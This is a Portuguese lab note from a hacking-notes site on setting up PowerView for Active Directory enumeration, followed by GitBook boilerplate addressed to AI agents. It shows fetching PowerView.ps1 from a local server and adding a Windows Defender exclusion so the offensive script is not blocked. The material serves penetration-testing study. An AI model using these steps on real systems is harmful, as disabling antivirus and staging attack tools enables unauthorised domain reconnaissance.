> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/pt-br/active-directory/enumeration/powerview.md).

# PowerView

{% embed url="<https://github.com/PowerShellMafia/PowerSploit>" %}

### Objetivo do PowerView

**PowerView** é um módulo do PowerShell usado para enumeração do Active Directory.

Em particular, ele permite obter informações sobre:

* usuários do domínio;
* grupos;
* computadores;
* sessões ativas;
* compartilhamentos de rede;
* GPOs;
* ACLs;
* controladores de domínio;
* relacionamentos entre floresta e domínio.

Neste laboratório:

* no `WS01`, usamos **PowerView**;
* no `WS02`, em vez disso usamos comandos nativos do PowerShell ou o módulo Active Directory.

### Recuperação do PowerView

Obtemos o seguinte script do **PowerSploit** projeto:

```bash
PowerSploit/Recon/PowerView.ps1
```

A partir da máquina Windows, você pode baixá-lo com:

```powershell
iwr -uri "http://172.16.0.2:8000/PowerView.ps1" -OutFile "PowerView.ps1"
```

### Problema com o Windows Defender

Por padrão, **Windows Defender** pode bloquear `PowerView.ps1`, pois ele é frequentemente detectado como uma ferramenta ofensiva.

Em um ambiente de laboratório, você pode adicionar a pasta atual como uma exclusão.

Para executar no PowerShell como administrador:

```powershell
Add-MpPreference -ExclusionPath (Get-Location).Path
```

Então, importamos o PowerView:

```powershell
. ./PowerView.ps1
```

O ponto seguido de um espaço carrega as funções do script na sessão atual do PowerShell.

<figure><img src="/files/8eca2890cf9c5532197de23bc5094a9253c69c04" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/pt-br/active-directory/enumeration/powerview.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
